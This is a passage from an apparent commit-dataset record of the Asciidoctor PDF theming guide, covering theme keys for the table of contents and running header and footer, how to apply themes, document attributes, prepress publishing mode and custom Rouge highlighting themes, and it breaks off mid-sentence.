#aa0000\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $heading_h2_font_family)\n|toc:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $heading_h2_font_size)\n|toc:\n title:\n font_size: 18\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $heading_h2_font_style)\n|toc:\n title:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $heading_h2_text_transform)\n|toc:\n title:\n text_transform: uppercase\n\n3+|[#key-prefix-toc-dot-leader]*Key Prefix:* <<key-prefix-toc-dot-leader,toc_dot_leader>>\n\n|content\n|<<quoted-string,Quoted string>> +\n(default: '. ')\n|toc:\n dot_leader:\n content: \". \"\n\n|font_color^[2]^\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n dot_leader:\n font_color: #999999\n\n|font_style^[2]^\n|<<font-styles,Font style>> +\n(default: normal)\n|toc:\n dot_leader:\n font_style: bold\n\n|levels^[3]^\n|all {vbar} none {vbar} Integers (space-separated) +\n(default: all)\n|toc:\n dot_leader:\n levels: 2 3\n|===\n\n. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.\n. The dot leader inherits all font properties except `font_style` from the root `toc` category.\n. 0-based levels (e.g., part = 0, chapter = 1).\nDot leaders are only shown for the specified levels.\nIf the value is not specified, dot leaders are shown for all levels.\n\n[#keys-running-content]\n=== Running Content (Header & Footer)\n\nThe keys in this category control the arrangement and style of running header and footer content.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-header]*Key Prefix:* <<key-prefix-header,header>>\n\n|background_color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n background_color: #eeeeee\n\n|border_color\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n border_color: #dddddd\n\n|border_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|header:\n border_style: dashed\n\n|border_width\n|<<measurement-units,Measurement>> +\n(default: $base_border_width)\n|header:\n border_width: 0.25\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|header:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|header:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|header:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|header:\n font_style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n height: 0.75in\n\n|line_height\n|<<values,Number>> +\n(default: $base_line_height)\n|header:\n line_height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|header:\n padding: [0, 3, 0, 3]\n\n|image_vertical_align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n image_vertical_align: 4\n\n|vertical_align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|header:\n vertical_align: middle\n\n|<side>_columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|header:\n recto:\n columns: <25% =50% >25%\n\n|<side>_<position>_content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|header:\n recto:\n left:\n content: '\\{page-number}'\n\n3+|[#key-prefix-footer]*Key Prefix:* <<key-prefix-footer,footer>>\n\n|background_color^[1]^\n|<<colors,Color>> +\n(default: _not 
set_)\n|footer:\n background_color: #eeeeee\n\n|border_color\n|<<colors,Color>> +\n(default: _not set_)\n|footer:\n border_color: #dddddd\n\n|border_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|footer:\n border_style: dashed\n\n|border_width\n|<<measurement-units,Measurement>> +\n(default: $base_border_width)\n|footer:\n border_width: 0.25\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|footer:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|footer:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|footer:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|footer:\n font_style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n height: 0.75in\n\n|line_height\n|<<values,Number>> +\n(default: $base_line_height)\n|footer:\n line_height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|footer:\n padding: [0, 3, 0, 3]\n\n|image_vertical_align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n image_vertical_align: 4\n\n|vertical_align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|footer:\n vertical_align: top\n\n|<side>_columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|footer:\n verso:\n columns: <50% =0% <50%\n\n|<side>_<position>_content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|footer:\n verso:\n center:\n content: '\\{page-number}'\n|===\n. The background color spans the width of the page, as does the border when a background color is specified.\n. If the height is not set, the running content at this periphery is disabled.\n. If the side padding is negative, the content will bleed into the margin of the page.\n. `<side>` can be `recto` (right-hand, odd-numbered pages) or `verso` (left-hand, even-numbered pages).\nWhere the page sides fall in relation to the physical or printed page number is controlled using the `pdf-folio-placement` attribute (except when `media=prepress`, which implies `physical`).\n. 
`<position>` can be `left`, `center` or `right`.\n\nIn a column specs triple (e.g., `<25% =50% >25%`), each spec sets the alignment (`<` for left, `=` for center, `>` for right) and the width of one of the three columns.\n\nIMPORTANT: You must define a height for the running header or footer; otherwise, it will not be shown.\n\nIf you define running header and footer content in your theme, you can still disable this content per document by setting the `noheader` and `nofooter` attributes in the AsciiDoc document header, respectively.\n\nIf content is not specified for the running footer, the page number (i.e., `\\{page-number}`) is shown on the left on verso pages and the right on recto pages.\nYou can disable this behavior by defining the attribute `nofooter` in the AsciiDoc document header or by defining the key `footer_<side>_content: none` in the theme.\n\nTIP: Although not listed in the table above, you can control the font properties used for running content for each column position on each page side (e.g., `footer_<side>_<position>_font_color`).\nFor example, you can set the font color used for the right-hand column on recto pages by setting `footer_recto_right_font_color: 6CC644`.
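\n\nFor instance, here's a minimal sketch that styles just the right-hand column on recto pages using that key (the color is borrowed from the example above):\n\n[source,yaml]\n----\nfooter:\n  height: 0.75in\n  recto:\n    right:\n      font_color: 6CC644\n      content: '{page-number}'\n----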
\n\n==== Attribute References\n\nYou can use _any_ attribute defined in your AsciiDoc document (such as `doctitle`) in the content of the running header and footer.\nIn addition, the following attributes are also available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* part-title\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nYou can also use built-in AsciiDoc text replacements like `+(C)+`, numeric character references like `+&#169;+`, and inline formatting (e.g., bold, italic, monospace).\n\nHere's an example that shows how attributes and replacements can be used in the running header and footer:\n\n[source,yaml]\n----\nheader:\n height: 0.75in\n line_height: 1\n recto:\n center:\n content: '(C) ACME -- v{revnumber}, {docdate}'\n verso:\n center:\n content: $header_recto_center_content\nfooter:\n height: 0.75in\n line_height: 1\n recto:\n right:\n content: '{section-or-chapter-title} | *{page-number}*'\n verso:\n left:\n content: '*{page-number}* | {chapter-title}'\n----\n\nYou can split the content value across multiple lines using YAML's multiline string syntax.\nIn this case, the single quotes around the string are not necessary.\nTo force a hard line break in the output, add `{sp}+` to the end of the line in normal AsciiDoc fashion.\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n line_height: 1.2\n recto:\n right:\n content: |\n Section Title - Page Number +\n {section-or-chapter-title} - {page-number}\n verso:\n left:\n content: |\n Page Number - Chapter Title +\n {page-number} - {chapter-title}\n----\n\nTIP: You can use most AsciiDoc inline formatting in the values of these keys.\nFor instance, to make the text bold, surround it in asterisks (as shown above).\nOne exception to this rule is inline images, which are described in the next section.\n\n==== Images\n\nYou can add an image to the running header or footer using the AsciiDoc inline image syntax.\nNote that the image must be the whole value for a given position (left, center or right).\nIt cannot be combined with text.\n\nHere's an example of how to use an image in the running header (which also applies to the footer).\n\n[source,yaml,subs=attributes+]\n----\nheader:\n height: 0.75in\n image_vertical_align: 2 {conum-guard-yaml} <1>\n recto:\n center:\n content: image:footer-logo.png[width=80]\n verso:\n center:\n content: $header_recto_center_content\n----\n<1> You can use the `image_vertical_align` key to slightly nudge the image up or down.\n\nCAUTION: By default, the image must fit in the allotted space for the running header or footer.\nOtherwise, you will run into layout issues.\nAdjust the image width as needed using the `pdfwidth` attribute.\nAlternatively, you can set the `fit` attribute to `scale-down` (e.g., `fit=scale-down`) to reduce the image size to fit in the available space or `contain` (e.g., `fit=contain`) to resize the image to the maximum size that will fit.\n\n== Applying Your Theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-stylesdir:: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n+\nIf you use images in your theme, image paths are resolved relative to this directory.\n\npdf-style:: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`).\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-stylesdir=resources\/themes -a pdf-style=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nYou can skip setting the `pdf-stylesdir` attribute and just pass the absolute path of your theme file to the `pdf-style` attribute.\n\n $ asciidoctor-pdf -a pdf-style=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nHowever, in this case, image paths in your theme won't be resolved properly.\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may change so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommended that you specify absolute paths for now to future-proof your configuration.\n\n $ asciidoctor-pdf -a pdf-stylesdir=\/path\/to\/resources\/themes -a pdf-style=basic -a pdf-fontsdir=\/path\/to\/resources\/fonts\n\nAs usual, you can also use build tools like Maven and Gradle to build a themed PDF.\nThe only thing you need to add to an existing build is the attributes mentioned above.\n\n* https:\/\/github.com\/asciidoctor\/asciidoctor-maven-examples\/tree\/master\/asciidoctor-pdf-with-theme-example[Maven Example]\n* https:\/\/github.com\/asciidoctor\/asciidoctor-gradle-examples\/tree\/master\/asciidoc-to-pdf-with-theme-example[Gradle Example]\n\n== Theme-Related Document Attributes\n\nThere are various settings in the theme you control using document attributes.\nThese settings override equivalent keys defined in the theme file, where applicable.\n\n[cols=\"2,3,6l\"]\n|===\n|Attribute |Value Type |Example\n\n|autofit-option\n|flag (default: _not set_)\n|:autofit-option:\n\n|chapter-label\n|string (default: Chapter)\n|:chapter-label: Chapitre\n\n|<face>-cover-image^[1]^\n|path^[2]^ 
{vbar} image macro^[3]^ +\n(format can be image or PDF)\n|:front-cover-image: image:front-cover.pdf[]\n\n|media\n|screen {vbar} print {vbar} prepress\n|:media: prepress\n\n|page-background-image^[4]^\n|path^[2]^ {vbar} image macro^[3]^\n|:page-background-image: image:bg.jpg[]\n\n|pagenums^[5]^\n|flag (default: _set_)\n|:pagenums:\n\n|pdf-page-layout\n|portrait {vbar} landscape\n|:pdf-page-layout: landscape\n\n|pdf-page-margin\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n|:pdf-page-margin: [1in, 0.5in]\n\n|pdf-page-size\n|https:\/\/github.com\/prawnpdf\/pdf-core\/blob\/0.6.0\/lib\/pdf\/core\/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width, height]>>\n|:pdf-page-size: 6in x 9in\n\n|pdf-folio-placement\n|virtual {vbar} virtual-inverted {vbar} physical {vbar} physical-inverted\n|:pdf-folio-placement: physical\n\n|pdfmark^[6]^\n|flag (default: _not set_)\n|:pdfmark:\n\n|text-alignment^[7]^\n|<<text-alignments,Text alignment>>\n|:text-alignment: left\n\n|title-logo-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-logo-image: image:logo.png[top=25%, align=center, pdfwidth=0.5in]\n\n|title-page^[8]^\n|flag (default: _not set_)\n|:title-page:\n\n|title-page-background-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-page-background-image: image:title-bg.jpg[]\n|===\n\n. `<face>` can be `front` or `back`.\n. The path is resolved relative to base_dir.\n. The target of the image macro is resolved relative to `imagesdir`.\nIf the image macro syntax is not used, the value is resolved relative to the base directory, which defaults to the document directory.\n. Page background images are automatically scaled to fit within the bounds of the page.\n+\nNOTE: Page backgrounds do not currently work when using AsciidoctorJ PDF.\nThis limitation is due to a bug in Prawn 1.3.1.\nThe limitation will remain until AsciidoctorJ PDF upgrades to Prawn 2.x (an upgrade that is waiting on AsciidoctorJ to migrate to JRuby 9000).\nFor more details, see http:\/\/discuss.asciidoctor.org\/Asciidoctor-YAML-style-file-for-PDF-and-maven-td3849.html[this thread].\n. Controls whether the `page-number` attribute is accessible to the running header and footer content specified in the theme file.\nUse the `noheader` and `nofooter` attributes to disable the running header and footer, respectively, from the document.\n. Enables generation of the http:\/\/milan.kupcevic.net\/ghostscript-ps-pdf\/#marks[pdfmark] file, which contains metadata that is fed to Ghostscript when optimizing the PDF file.\n. _(Experimental)_ The `text-alignment` document attribute is intended as a simple way to toggle text justification.\nThe value of this attribute overrides the `base_align` key set by the theme.\nFor more fine-grained control, you should customize using the theme.\n. 
Forces a title page to be added even when the doctype is not book.\n\n== Publishing Mode\n\nAsciidoctor PDF provides the following features to assist with publishing:\n\n* Double-sided (mirror) page margins\n* Automatic facing pages\n\nThese features are activated when you set the `media` attribute to `prepress` in the header of your AsciiDoc document or from the CLI or API.\nThe following sections describe the behaviors that this setting activates.
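\n\nFor example, here's a minimal sketch of how you might turn on prepress mode from the CLI without touching the document (the document name is a placeholder):\n\n $ asciidoctor-pdf -a media=prepress document.adoc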
\n\n=== Double-Sided Page Margins\n\nThe page margins for the recto (right-hand, odd-numbered) and verso (left-hand, even-numbered) pages are automatically calculated by replacing the side page margins with the values of the `page_margin_inner` and `page_margin_outer` keys.\n\nFor example, let's assume you've defined the following settings in your theme:\n\n[source,yaml]\n----\npage:\n margin: [0.5in, 0.67in, 0.67in, 0.67in]\n margin_inner: 0.75in\n margin_outer: 0.59in\n----\n\nThe page margins for the recto and verso pages will be resolved as follows:\n\nrecto page margin:: [0.5in, *0.59in*, 0.67in, *0.75in*]\nverso page margin:: [0.5in, *0.75in*, 0.67in, *0.59in*]\n\nThe page margins alternate between recto and verso.\nThe first page in the document is a recto page.\n\n=== Automatic Facing Pages\n\nWhen converting the book doctype using the prepress media setting, a blank page will be inserted when necessary to ensure the following elements start on a recto page:\n\n* Title page\n* Table of contents\n* First page of body\n* Parts and chapters\n\nOther \"`facing`\" pages may be added in the future.\n\nIt's possible to disable the automatic facing feature for a given part or chapter.\nThis can be done by adding the `nonfacing` option to the section node.\nWhen the `nonfacing` option is present, the part or chapter title will be placed on the following page.\n\n[source,asciidoc]\n----\n[%nonfacing]\n= Minor Chapter\n\ncontent\n----\n\nFor documents that use the article doctype, Asciidoctor PDF incorrectly places the document title and table of contents on their own pages.\nThis can cause the page numbering and the page facing to fall out of sync.\nAs a workaround, Asciidoctor PDF inserts a blank page, if necessary, to ensure the first page of body content is a recto-facing page.\n\nYou can check on the status of this defect by following https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/95[issue #95].\n\n== Source Highlighting Theme\n\nYou can define and apply your own source highlighting theme to source blocks when using Rouge as the source highlighter.\nThis section explains how.\n\nA custom theme for Rouge is defined using a Ruby class.\nStart by creating a Ruby source file to define your theme.\nName the file according to the name of your theme and put the file in a folder of your choice (e.g., [.path]_rouge_themes\/custom.rb_).\nThe name of the Ruby class doesn't matter, though it's customary to name it according to the name of the theme as well.\n\n.rouge_themes\/custom.rb\n[source,ruby]\n----\nrequire 'rouge' unless defined? ::Rouge.version\n\nmodule Rouge; module Themes\n class Custom < CSSTheme\n name 'custom'\n\n style Comment, fg: '#008800', italic: true\n style Error, fg: '#a61717', bg: '#e3d2d2'\n style Str, fg: '#0000ff'\n style Str::Char, fg: '#800080'\n style Num, fg: '#0000ff'\n style Keyword, fg: '#000080', bold: true\n style Operator::Word, bold: true\n style Name::Tag, fg: '#000080', bold: true\n style Name::Attribute, fg: '#ff0000'\n style Generic::Deleted, fg: '#000000', bg: '#ffdddd', inline_block: true, extend: true\n style Generic::Inserted, fg: '#000000', bg: '#ddffdd', inline_block: true, extend: true\n style Text, {}\n end\nend; end\n----\n\nEach style declaration accepts the following properties:\n\n* `fg` - sets the foreground (text) color\n* `bg` - sets the background color\n* `bold` - changes the font weight to bold\n* `italic` - changes the font style to italic\n* `underline` - adds an underline to the text\n* `inline_block` - fills the background color to the height of the line (Asciidoctor PDF only)\n* `extend` - extends the background color to the end of the line for a line-oriented match (Asciidoctor PDF only)\n\nColors are defined using hexadecimal format (e.g., #ff0000 for red).\n\nUse the `Text` token to set the background color of the source block and the default text color.\n\nThe complete list of tokens can be found in the https:\/\/github.com\/jneen\/rouge\/blob\/master\/lib\/rouge\/token.rb[token.rb] file from Rouge.\nRefer to the https:\/\/github.com\/jneen\/rouge\/tree\/master\/lib\/rouge\/themes[bundled themes] to find more examples.\n\nOnce you've defined your theme, you need to enable it using the `rouge-style` document attribute, which you specify in the document header or via the Asciidoctor CLI or API.\n\n[source,asciidoc]\n----\n:source-highlighter: rouge\n:rouge-style: custom\n----\n\nFinally, you need to activate your theme by requiring the theme file when you invoke Asciidoctor.\n\n $ asciidoctor -r .\/rouge_themes\/custom.rb sample.adoc\n\nYou should now see that the source code is highlighted to your liking.\nFor more information about source highlighting with Rouge, refer to the http:\/\/rouge.jneen.net\/[Rouge project page].\n\n\/\/\/\/\n== Resources for Extending Asciidoctor PDF\n\n* http:\/\/www.sitepoint.com\/hackable-pdf-typesetting-in-ruby-with-prawn[Hackable PDF typesetting in Ruby with Prawn]\n\/\/\/\/\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ea18fa349a8287e8af2496691163f424695c3b19","subject":"clarify background color and image settings in theming guide [skip ci]","message":"clarify background color and image settings in theming guide [skip ci]\n","repos":"mojavelinux\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf","old_file":"docs\/theming-guide.adoc","new_file":"docs\/theming-guide.adoc","new_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux[@mojavelinux]>\n\/\/ Settings:\n:idprefix:\n:idseparator: -\n:toc: preamble\n:experimental:\nifndef::env-github[:icons: font]\nifdef::env-github[]\n:outfilesuffix: .adoc\n:!toc-title:\n:caution-caption: :fire:\n:important-caption: :exclamation:\n:note-caption: :paperclip:\n:tip-caption: :bulb:\n:warning-caption: :warning:\nendif::[]\n:window: _blank\n\/\/ Aliases:\n:conum-guard-yaml: #\nifndef::icons[:conum-guard-yaml: # #]\nifdef::backend-pdf[:conum-guard-yaml: # 
#]\n:url-fontforge: https:\/\/fontforge.github.io\/en-US\/\n:url-fontforge-scripting: https:\/\/fontforge.github.io\/en-US\/documentation\/scripting\/\n\n\/\/\/\/\nTopics remaining to document:\n* line height and line height length (and what that all means)\n* title page layout \/ title page images (logo & background)\n* document that unicode escape sequences can be used inside double-quoted strings\n\/\/\/\/\n\n[.lead]\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file Asciidoctor PDF generates from AsciiDoc.\nThis document describes how the theming system works, how to define a custom theme in YAML and how to activate the theme when running Asciidoctor PDF.\n\nTIP: The quickest way to get started creating your own theme is to <<Extends,extend the default theme>>.\nThis not only gives you all the styles you need to build on, but also a collection of <<Bundled Fonts,bundled fonts>>.\nIf you override the font catalog in your theme file, you must declare all the fonts you use (and provide the font files themselves).\nInstead, if you want to reuse the bundled fonts, simply reference the <<Bundled Fonts,bundled fonts>> in the <<Custom Fonts,font catalog>>.\n\nWARNING: If you don't declare your own fonts (or extend the default theme), only the built-in (AFM) fonts provided by the PDF reader will be available.\nUsing AFM fonts can result in missing functionality and warnings.\nSee the <<Built-In (AFM) Fonts>> section to learn more about these limitations.\n\ntoc::[]\n\n== Language Overview\n\nThe Asciidoctor PDF theme language is described using the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many _concepts_ from CSS and SASS.\nTherefore, if you have a background in web design, the terminology should be immediately familiar to you.\n*Note, however, that the theming system isn't actually CSS.*\n\nLike CSS, themes have both selectors and properties.\nSelectors are the components you want to style.\nThe properties are the style elements of those components that can be styled.\nAll selector names are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font-size`).\n\n[NOTE]\n====\nThe theme language in Asciidoctor PDF supports a limited subset of the properties from CSS.\nSome of these properties have different names from those found in CSS.\n\n* An underscore (`_`) may be used in place of a hyphen (`-`) in all property names (so you may use `font_family` or `font-family`).\n* An underscore (`_`) may be used in place of a hyphen (`-`) in all variable names (so you may use `$base_font_family` or `$base-font-family`).\n* Instead of separate properties for font weight and font style, the theme language combines these settings in the `font-style` property (allowed values: `normal`, `bold`, `italic` and `bold_italic`).\n* The `align` property in the theme language is roughly equivalent to the `text-align` property in CSS.\n* The `font-color` property in the theme language is equivalent to the `color` property in CSS.\n====\n\nA theme is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that resembles CSS and helps to describe the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the 
theme.\n\nHere's an example of a basic theme file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font-color: #333333\n font-family: Times-Roman\n font-size: 12\n line-height-length: 17\n line-height: $base-line-height-length \/ $base-font-size\nvertical-spacing: $base-line-height-length\nheading:\n font-color: #262626\n font-size: 17\n font-style: bold\n line-height: 1.2\n margin-bottom: $vertical-spacing\nlink:\n font-color: #002FA7\noutline-list:\n indent: $base-font-size * 1.5\nfooter:\n height: $base-line-height-length * 2.5\n line-height: 1\n recto:\n right:\n content: '{page-number}'\n verso:\n left:\n content: $footer-recto-right-content\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme, which is loaded prior to loading your custom theme.\nAll the available keys are documented in <<Keys>>.\nThe converter uses the information from the theme map to help construct the PDF.\n\nInstead of writing a theme from scratch, you can extend the default theme using the `extends` key as follows:\n\n[source,yaml]\n----\nextends: default\nbase:\n font-color: #ff0000\n----\n\nYou can also point the extends key at another custom theme to extend from it.\nCurrently, the base theme is always loaded first.\n\nWARNING: If you start a new theme from scratch, we strongly recommend defining TrueType fonts and specifying them in the `base` and `literal` categories.\nOtherwise, Asciidoctor PDF will use built-in AFM fonts, which can result in missing functionality and warnings.\n\n[TIP]\n====\nInstead of creating a theme from scratch, another option is to download the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default-theme.yml] file from the source repository.\nSave the file using a unique name (e.g., _custom-theme.yml_) and start hacking on it.\n\nAlternatively, you can snag the file from your local installation using the following command:\n\n $ ASCIIDOCTOR_PDF_DIR=`gem contents asciidoctor-pdf --show-install-dir`;\\\n cp \"$ASCIIDOCTOR_PDF_DIR\/data\/themes\/default-theme.yml\" custom-theme.yml\n====\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`) or hyphen (`-`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font-color`) into a single, qualified key (e.g., `link_font_color` or `link-font-color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase-font-color: #333333\nbase-font-family: Times-Roman\nbase-font-size: 12\n----\n\nOr, to avoid having to type the prefix `base-` multiple times, the keys may be written as a hierarchy:\n\n[source,yaml]\n----\nbase:\n font-color: #333333\n font-family: Times-Roman\n font-size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by two spaces from the indentation of the parent level.\nAlso note the presence of the colon (`:`) after each key name.\n\n== Values\n\nThe value of a key may be one of the 
following types:\n\n* String\n ** Font family name (e.g., Roboto)\n ** Font style (normal, bold, italic, bold_italic)\n ** Alignment (left, center, right, justify)\n ** Color as hex string (e.g., 'ff0000', #ff0000, or '#ff0000')\n ** Image path\n ** Enumerated type (where specified)\n ** Text content (where specified)\n* Null (clears any previously assigned value)\n ** _empty_ (i.e., no value specified)\n ** null\n ** ~\n* Number (integer or float) with optional units (default unit is points)\n* Array\n ** Color as RGB array (e.g., [51, 51, 51])\n ** Color as CMYK array (e.g., [50, 100, 0, 0])\n ** Margin (e.g., [1in, 1in, 1in, 1in])\n ** Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color or $base-font-color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<Keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a principal feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font-family\n* font-color\n* font-size\n* font-style\n* text-transform\n* line-height (currently some exceptions)\n* margin-bottom (if not specified, defaults to $vertical-spacing)\n\n.Heading Inheritance\n****\nHeadings inherit starting from a specific heading level (e.g., `heading-h2-font-size`), then to the heading category (e.g., `heading-font-size`), then directly to the base value (e.g., `base-font-size`).\nAny setting from an enclosing context, such as a sidebar, is skipped.\n****
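\n\nFor instance, in the following minimal sketch, the sidebar text inherits the base font family and size and overrides only the font color (the values are arbitrary choices):\n\n[source,yaml]\n----\nbase:\n  font-family: Noto Serif\n  font-size: 10.5\n  font-color: #333333\nsidebar:\n  font-color: #5c6266\n----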
\n\n=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar sign (`$`) (e.g., `$base-font-size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In other words, as soon as the key is assigned, it's available to be used as a variable).\n\nIMPORTANT: Variables are defined from top to bottom (i.e., in document order).\nTherefore, a variable must be defined before it is referenced.\nIn other words, the path the variable refers to must be *above* the usage of that variable.\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font-color: #333333\n----\n\nthe variable `$base-font-color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading-font-color` to the `sidebar-title-font-color` key.\n\n[source,yaml]\n----\nheading:\n font-color: #191919\nsidebar:\n title:\n font-color: $heading-font-color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very quickly.\n\n[source,yaml]\n----\nbase:\n font-size: 12\n font-size-large: $base-font-size * 1.25\n font-size-small: $base-font-size * 0.85\n----\n\nWe'll cover more about math expressions later.\n\n==== Custom Variables\n\nYou can define arbitrary key names to make custom variables.\nThis is one way to group reusable values at the top of your theme file.\nIf you are going to do this, it's recommended that you organize the keys under a custom namespace, such as `brand`.\n\nFor instance, here's how you can define your brand colors:\n\n[source,yaml,subs=attributes+]\n----\nbrand:\n primary-color: #E0162B {conum-guard-yaml} <1>\n secondary-color: '#FFFFFF' {conum-guard-yaml} <2>\n alert-color: '0052A5' {conum-guard-yaml} <3>\n----\n<1> To align with CSS, you may add `+#+` in front of the hex color value to coerce it to a string.\nA YAML preprocessor is used to ensure the value is not treated as a comment as would normally be the case in YAML.\n<2> You may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.\n<3> The leading `+#+` on a hex value is entirely optional.\nHowever, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value (for example, 000000 would become 0, so use '000000' or #000000 instead).\n\nYou can now use these custom variables later in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: $brand-primary-color\n----\n\n=== Math Expressions & Functions\n\nThe theme language supports basic math operations to support calculated values.\nAs in programming languages, multiply and divide take precedence over add and subtract.\n\nThe following table lists the supported operations and the corresponding operator for each.\n\n[width=25%]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nIMPORTANT: Operators must always be surrounded by a space on either side (e.g., 2 + 2, not 2+2).\n\nHere's an example of a math expression with fixed 